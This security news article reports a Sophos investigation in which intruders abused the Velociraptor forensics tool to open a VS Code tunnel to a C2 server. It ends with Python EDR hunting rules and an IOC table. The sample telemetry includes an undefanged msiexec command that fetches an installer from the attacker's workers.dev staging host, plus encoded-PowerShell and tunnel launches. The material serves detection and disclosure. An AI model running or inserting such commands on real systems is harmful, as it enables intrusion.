Threat Actors Exploit Velociraptor Incident Response Tool for Remote Access

Researchers from the Counter Threat Unit (CTU) at Sophos uncovered a sophisticated intrusion where threat actors repurposed the legitimate open-source Velociraptor digital forensics and incident response (DFIR) tool to establish unauthorized remote access within targeted networks.

Velociraptor, designed for endpoint visibility and forensic analysis, was deployed maliciously to download and execute Visual Studio Code, facilitating a tunneling mechanism that connected to an attacker-controlled command and control (C2) server.

This tactic allowed potential remote access and code execution, a method previously exploited by various threat groups.

Tactics Employed

The intrusion began with the Windows msiexec utility fetching an installer file named v2.msi from a Cloudflare Workers domain, specifically files[.]qaubctgg[.]workers[.]dev, which served as a staging repository for attacker tools including Cloudflare tunneling utilities and the Radmin remote administration tool.

[Figure: Process tree showing Velociraptor creating a Visual Studio Code tunnel.]

Once installed, Velociraptor was configured to communicate with the C2 domain velo[.]qaubctgg[.]workers[.]dev.

The attackers then executed an encoded PowerShell command to retrieve Visual Studio Code (code.exe) from the same staging location, launching it with tunneling enabled.

To maintain persistence, code.exe was installed as a Windows service, with its output redirected to a log file for monitoring.

Subsequently, msiexec was invoked again to download additional malware via sc.msi from the workers[.]dev infrastructure.

This sequence formed a process tree where Velociraptor acted as the parent process spawning the Visual Studio Code tunnel, as observed in forensic analysis.

The tunneling activity triggered an alert in the Taegis security platform, prompting a rapid Sophos investigation that provided mitigation guidance, including host isolation, ultimately thwarting the attackers’ objectives and preventing likely ransomware deployment.

Broader Implications

This incident highlights a growing trend among threat actors who abuse remote monitoring and management (RMM) tools, including incident response utilities like Velociraptor, to minimize detectable malware footprints and pivot within compromised environments.

Unlike traditional attacks that deploy bespoke malware, this approach relies on legitimate tools that are either already present in the environment (for example, reached by exploiting vulnerabilities in products such as SimpleHelp) or newly introduced during an active intrusion, using them to achieve persistence and exfiltration.

According to the report, CTU analysis indicates that unauthorized Velociraptor usage often serves as a precursor to ransomware, emphasizing the need for vigilant monitoring of unexpected tool deployments and anomalous behaviors like unusual tunneling or service installations.

Organizations can enhance defenses by implementing endpoint detection and response (EDR) systems to scrutinize process trees, network communications, and file downloads from suspicious domains.
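To show what that process-tree and download scrutiny looks like in practice, the following Python hunting rules (an added example, not code from the Sophos report or the Velociraptor project) encode the chain described above and run it over constructed telemetry; the event field names, command lines and the Velociraptor binary name are assumptions rather than values from the report.

```python
"""Hunting rules for the Velociraptor -> VS Code tunnel chain described above.
Events are constructed samples; field names are assumptions, not any EDR's schema."""
import re

STAGING = re.compile(r"https?://[^\s\"']*\.workers\.dev", re.I)   # Cloudflare Workers staging host
ENC_PS = re.compile(r"-e(?:c|nc|ncodedcommand)?\b\s+[A-Za-z0-9+/=]{20,}", re.I)

def classify(ev: dict) -> list:
    """Return every rule name the event matches (empty list = nothing suspicious)."""
    hits = []
    img = ev.get("image", "").lower()
    parent = ev.get("parent_image", "").lower()
    cmd = ev.get("cmdline", "")
    # msiexec fetching an installer straight from a workers.dev host (v2.msi, sc.msi)
    if img.endswith("msiexec.exe") and STAGING.search(cmd):
        hits.append("msiexec_remote_msi_workers_dev")
    # encoded PowerShell, the method the intruders used to retrieve code.exe
    if img.endswith("powershell.exe") and ENC_PS.search(cmd):
        hits.append("powershell_encoded_command")
    # VS Code started with tunnelling enabled; escalate when the parent is the DFIR agent
    if img.endswith("code.exe") and re.search(r"\btunnel\b", cmd, re.I):
        hits.append("vscode_tunnel")
        if "velociraptor" in parent:  # assumed binary name of the Velociraptor agent
            hits.append("velociraptor_spawns_vscode_tunnel")
    # code.exe registered as a Windows service for persistence
    if ev.get("event") == "service_install" and ev.get("image_path", "").lower().endswith("code.exe"):
        hits.append("vscode_installed_as_service")
    return hits

def hunt(events: list) -> dict:
    """Map event id -> matched rules, keeping only events that matched something."""
    return {ev["id"]: h for ev in events if (h := classify(ev))}

# Constructed sample telemetry mirroring the reported chain; e5 is a benign VS Code launch
SAMPLE_EVENTS = [
    {"id": "e1", "event": "process_create", "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "msiexec /i https://files.qaubctgg.workers.dev/v2.msi /qn"},
    {"id": "e2", "event": "process_create", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"},
    {"id": "e3", "event": "process_create", "image": r"C:\Tools\code.exe",
     "parent_image": r"C:\Program Files\Velociraptor\Velociraptor.exe", "cmdline": "code.exe tunnel"},
    {"id": "e4", "event": "service_install", "image_path": r"C:\Tools\code.exe", "name": "code"},
    {"id": "e5", "event": "process_create", "image": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": '"Code.exe" C:\\src\\main.py'},
]
```

Calling `hunt(SAMPLE_EVENTS)` flags e1 through e4 and leaves the ordinary editor launch e5 untouched; in a real deployment the same rules would run over EDR process-creation and service-install telemetry.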

Best practices include restricting access to known malicious indicators, enforcing least-privilege principles, and maintaining robust backup strategies to reduce attack impacts.

Sophos detections such as Troj/Agent-BLMR, Troj/BatDl-PL, and Troj/Mdrop-KDK specifically identify related threats, enabling proactive blocking.

By treating observations of this tradecraft as high-priority alerts and investigating them promptly, enterprises can disrupt attack chains before escalation to data encryption or exfiltration.

Indicators of Compromise (IOCs)

Indicator                         | Type        | Context
files[.]qaubctgg[.]workers[.]dev  | Domain name | Hosted tools used in August 2025 Velociraptor campaign
velo[.]qaubctgg[.]workers[.]dev   | Domain name | C2 server used in August 2025 Velociraptor campaign
